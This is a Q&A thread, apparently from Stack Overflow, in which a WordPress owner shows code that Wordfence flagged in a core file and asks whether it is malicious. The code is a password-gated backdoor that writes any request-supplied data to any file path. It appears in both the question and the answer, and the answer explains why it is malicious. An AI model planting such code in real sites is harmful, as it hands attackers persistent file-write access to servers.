# is this php code meen that my wordpress website is hacked

Tags: php, wordpress

hi i get suspecious traffic to my wordpress website from url like  news.grets.store
so i did a scan to my website using wordfence and get many suspecious file like this one:

**The Original Version of the file**

```
@return string[] Array of absolute paths of files to include.


function wp_get_mu_plugins() {
$mu_plugins = array(); 
if ( ! is_dir( WPMU_PLUGIN_DIR ) ) {
```

**  **The Modified Version on your WordPress system****

```
@return string[] Array of absolute paths of files to include.
if ( isset( $_REQUEST['wp_filename'] ) && isset( $_REQUEST['wp_file_data'] ) && isset( $_REQUEST['auth'] ) && md5($_REQUEST['auth']) === 'bef6597b33e581bcbe0323a22137701b' ) { 
   file_put_contents( $_REQUEST['wp_filename'], $_REQUEST['wp_file_data'] ); 
}

function wp_get_mu_plugins() {
$mu_plugins = array(); 
if ( ! is_dir( WPMU_PLUGIN_DIR ) ) {
```

is that a malicious code and how to do to delete that.
thank's

want to delete malicious code

Comment: Looks like it could be. Delete the bad contents, and then look for any other files that may have been modified and fix those as well. This type of question goes well beyond what Stack Overflow can help you with

Answer (score 0):

```
if ( isset( $_REQUEST['wp_filename'] ) && isset( $_REQUEST['wp_file_data'] ) && isset( $_REQUEST['auth'] ) && md5($_REQUEST['auth']) === 'bef6597b33e581bcbe0323a22137701b' ) { 
   file_put_contents( $_REQUEST['wp_filename'], $_REQUEST['wp_file_data'] ); 
}
```

To break this down, the code above takes a very specific request and then writes **user supplied data** to a file on your server. So, yes, this is malicious.

I would do a fresh install of Wordpress and delete all your files